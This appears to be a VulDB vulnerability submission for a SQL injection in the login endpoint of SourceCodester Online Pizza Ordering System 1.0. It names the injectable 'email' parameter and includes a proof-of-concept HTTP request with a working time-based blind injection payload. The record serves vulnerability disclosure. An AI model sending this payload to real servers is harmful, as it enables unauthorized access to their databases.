| Field | Value |
|---|---|
| Title | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
| Description | A SQL Injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0; a remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page. The parameter 'email' is injectable. An effective PoC is given below the table; it is a time-based blind injection and the server will respond in 5 s. |
| Source | https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
| User | WWesleywww (UID 43117) |
| Submission | 17.03.2023 07:47 (3 years ago) |
| Moderation | 17.03.2023 07:58 (12 minutes later) |
| Status | Accepted |
| VulDB Entry | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email SQL Injection] |
| Points | 20 |

Proof of concept from the submission:

```http
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
```